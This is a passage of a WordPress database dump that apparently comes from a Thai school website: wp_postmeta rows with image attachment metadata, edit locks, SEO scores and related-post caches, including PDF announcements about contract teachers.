(13402, 5907, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1073;s:6:\"height\";i:1526;s:4:\"file\";s:21:\"2019/06/270662-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"270662-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"270662-06-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"270662-06-768x1092.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1092;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"270662-06-720x1024.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"270662-06-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13403, 5908, '_wp_attached_file', '2019/06/270662-05.jpg'),
(13404, 5908, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1083;s:6:\"height\";i:1510;s:4:\"file\";s:21:\"2019/06/270662-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"270662-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"270662-05-215x300.jpg\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"270662-05-768x1071.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1071;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"270662-05-734x1024.jpg\";s:5:\"width\";i:734;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"270662-05-215x300.jpg\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13405, 5909, '_wp_attached_file', '2019/06/270662-04.jpg'),
(13406, 5909, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1073;s:6:\"height\";i:1525;s:4:\"file\";s:21:\"2019/06/270662-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"270662-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"270662-04-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"270662-04-768x1092.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1092;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"270662-04-720x1024.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"270662-04-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13407, 5910, '_wp_attached_file', '2019/06/270662-03.jpg'),
(13408, 5910, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1062;s:6:\"height\";i:1541;s:4:\"file\";s:21:\"2019/06/270662-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"270662-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"270662-03-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"270662-03-768x1114.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1114;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"270662-03-706x1024.jpg\";s:5:\"width\";i:706;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"270662-03-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13409, 5906, '_edit_last', '14'),
(13413, 5906, '_hide_featured', NULL),
(13414, 5906, '_yoast_wpseo_content_score', '30'),
(13415, 5906, '_yoast_wpseo_primary_category', '3'),
(13416, 5906, '_wpas_done_all', '1'),
(13421, 5906, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575734067;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6008;}i:1;a:1:{s:2:\"id\";i:6259;}i:2;a:1:{s:2:\"id\";i:6189;}}}}'),
(13422, 5903, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575040184;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5920;}i:1;a:1:{s:2:\"id\";i:3961;}i:2;a:1:{s:2:\"id\";i:5855;}}}}'),
(13423, 5900, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575504476;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:6063;}i:2;a:1:{s:2:\"id\";i:4017;}}}}'),
(13424, 5912, '_edit_lock', '1568451698:14'),
(13425, 5912, '_edit_last', '14'),
(13426, 5913, '_wp_attached_file', '2019/07/020762-ประกาศรายชื่อผุ้มีสิทธิสอบครูอัตราจ้าง.pdf'),
(13430, 5912, '_hide_featured', NULL),
(13431, 5912, '_yoast_wpseo_content_score', '30'),
(13432, 5912, '_yoast_wpseo_primary_category', '3'),
(13433, 5912, '_wpas_done_all', '1'),
(13434, 5912, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575453098;s:7:\"payload\";a:0:{}}}'),
(13437, 5917, '_edit_lock', '1568451715:14'),
(13438, 5917, '_edit_last', '14'),
(13439, 5918, '_wp_attached_file', '2019/07/020762-04.jpg'),
(13440, 5918, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:21:\"2019/07/020762-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020762-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020762-04-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"020762-04-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"020762-04-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020762-04-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13441, 5917, '_thumbnail_id', '5918'),
(13445, 5917, '_hide_featured', NULL),
(13446, 5917, '_yoast_wpseo_content_score', '30'),
(13447, 5917, '_yoast_wpseo_primary_category', '31'),
(13448, 5917, '_wpas_done_all', '1'),
(13453, 5920, '_edit_lock', '1568451744:14'),
(13454, 5920, '_edit_last', '14'),
(13455, 5921, '_wp_attached_file', '2019/07/020762-03.jpg'),
(13456, 5921, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:21:\"2019/07/020762-03.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020762-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020762-03-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"020762-03-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020762-03-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13457, 5920, '_thumbnail_id', '5921'),
(13461, 5920, '_hide_featured', NULL),
(13462, 5920, '_yoast_wpseo_content_score', '30'),
(13463, 5920, '_yoast_wpseo_primary_category', '31'),
(13464, 5920, '_wpas_done_all', '1'),
(13467, 5923, '_edit_lock', '1568451754:14'),
(13468, 5923, '_edit_last', '14'),
(13469, 5924, '_wp_attached_file', '2019/07/020762-02.jpg'),
(13470, 5924, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/07/020762-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020762-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020762-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020762-02-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13471, 5923, '_thumbnail_id', '5924');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(13475, 5923, '_hide_featured', NULL),
(13476, 5923, '_yoast_wpseo_content_score', '30'),
(13477, 5923, '_yoast_wpseo_primary_category', '31'),
(13478, 5923, '_wpas_done_all', '1'),
(13479, 5926, '_edit_lock', '1568451781:14'),
(13480, 5926, '_edit_last', '14'),
(13481, 5927, '_wp_attached_file', '2019/07/020762-01.jpg'),
(13482, 5927, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:21:\"2019/07/020762-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"020762-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"020762-01-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"020762-01-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"020762-01-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"020762-01-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13483, 5926, '_thumbnail_id', '5927'),
(13487, 5926, '_hide_featured', NULL),
(13488, 5926, '_yoast_wpseo_content_score', '30'),
(13489, 5926, '_yoast_wpseo_primary_category', '31'),
(13490, 5926, '_wpas_done_all', '1'),
(13493, 3485, '_yoast_wpseo_content_score', '90'),
(13494, 5926, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575715591;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6154;}i:1;a:1:{s:2:\"id\";i:6332;}i:2;a:1:{s:2:\"id\";i:4863;}}}}'),
(13495, 5917, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575640737;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6014;}i:1;a:1:{s:2:\"id\";i:6163;}i:2;a:1:{s:2:\"id\";i:5294;}}}}'),
(13496, 5923, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575248988;s:7:\"payload\";a:0:{}}}'),
(13497, 5920, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575485786;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3961;}i:1;a:1:{s:2:\"id\";i:5903;}i:2;a:1:{s:2:\"id\";i:5764;}}}}'),
(13499, 5932, '_edit_lock', '1568451803:14'),
(13500, 5932, '_edit_last', '14'),
(13501, 5933, '_wp_attached_file', '2019/07/040762-ประกาศรายชื่อครูจ้าง-ชฟ.การโรงแรม.pdf'),
(13505, 5932, '_hide_featured', NULL),
(13506, 5932, '_yoast_wpseo_content_score', '60'),
(13507, 5932, '_yoast_wpseo_primary_category', '3'),
(13508, 5932, '_wpas_done_all', '1'),
(13511, 5932, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575720919;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6119;}i:1;a:1:{s:2:\"id\";i:5026;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(13512, 5936, '_edit_lock', '1568451977:14'),
(13513, 5936, '_edit_last', '14'),
(13514, 5937, '_wp_attached_file', '2019/07/040762-01.png'),
(13515, 5937, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/040762-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040762-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040762-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040762-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040762-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040762-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13516, 5936, '_thumbnail_id', '5937'),
(13520, 5936, '_hide_featured', NULL),
(13521, 5936, '_yoast_wpseo_content_score', '30'),
(13522, 5936, '_yoast_wpseo_primary_category', '31'),
(13523, 5936, '_wpas_done_all', '1'),
(13526, 5939, '_edit_lock', '1568451993:14'),
(13527, 5939, '_edit_last', '14'),
(13528, 5940, '_wp_attached_file', '2019/07/040762-02.png'),
(13529, 5940, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/040762-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040762-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040762-02-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040762-02-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040762-02-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040762-02-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13530, 5939, '_thumbnail_id', '5940'),
(13534, 5939, '_hide_featured', NULL),
(13535, 5939, '_yoast_wpseo_content_score', '30'),
(13536, 5939, '_yoast_wpseo_primary_category', '31'),
(13537, 5939, '_wpas_done_all', '1'),
(13544, 5936, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575199307;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4160;}i:1;a:1:{s:2:\"id\";i:5327;}i:2;a:1:{s:2:\"id\";i:5324;}}}}'),
(13545, 5939, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575629567;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6040;}i:1;a:1:{s:2:\"id\";i:5865;}i:2;a:1:{s:2:\"id\";i:5948;}}}}'),
(13550, 5944, '_wp_attached_file', '2019/07/080762-02.png'),
(13551, 5944, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/080762-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"080762-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"080762-02-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"080762-02-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"080762-02-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"080762-02-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13552, 5945, '_edit_lock', '1568452086:14'),
(13553, 5945, '_edit_last', '14'),
(13554, 5945, '_thumbnail_id', '5944'),
(13558, 5945, '_hide_featured', NULL),
(13559, 5945, '_yoast_wpseo_content_score', '30'),
(13560, 5945, '_yoast_wpseo_primary_category', '31'),
(13561, 5945, '_wpas_done_all', '1'),
(13568, 5949, '_wp_attached_file', '2019/07/080762-01.png'),
(13569, 5949, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/07/080762-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"080762-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"080762-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"080762-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"080762-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"080762-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13570, 5948, '_edit_lock', '1568452140:14'),
(13571, 5948, '_edit_last', '14'),
(13572, 5948, '_thumbnail_id', '5949'),
(13576, 5948, '_hide_featured', NULL),
(13577, 5948, '_yoast_wpseo_content_score', '30'),
(13578, 5948, '_yoast_wpseo_primary_category', '31'),
(13579, 5948, '_wpas_done_all', '1'),
(13584, 5948, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575716045;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3979;}i:1;a:1:{s:2:\"id\";i:3975;}i:2;a:1:{s:2:\"id\";i:3971;}}}}'),
(13591, 5945, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574413567;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5994;}i:1;a:1:{s:2:\"id\";i:5733;}i:2;a:1:{s:2:\"id\";i:5635;}}}}'),
(13592, 5952, '_edit_lock', '1568452163:14'),
(13593, 5952, '_edit_last', '14'),
(13594, 5954, '_wp_attached_file', '2019/07/090762-01.pdf'),
(13598, 5952, '_hide_featured', NULL),
(13599, 5952, '_yoast_wpseo_content_score', '60'),
(13600, 5952, '_yoast_wpseo_primary_category', '3'),
(13601, 5952, '_wpas_done_all', '1'),
(13604, 5952, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575704087;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5680;}i:1;a:1:{s:2:\"id\";i:5589;}i:2;a:1:{s:2:\"id\";i:5878;}}}}'),
(13605, 5957, '_edit_lock', '1568452178:14'),
(13606, 5957, '_edit_last', '14'),
(13607, 5958, '_wp_attached_file', '2019/07/090762-01.png'),
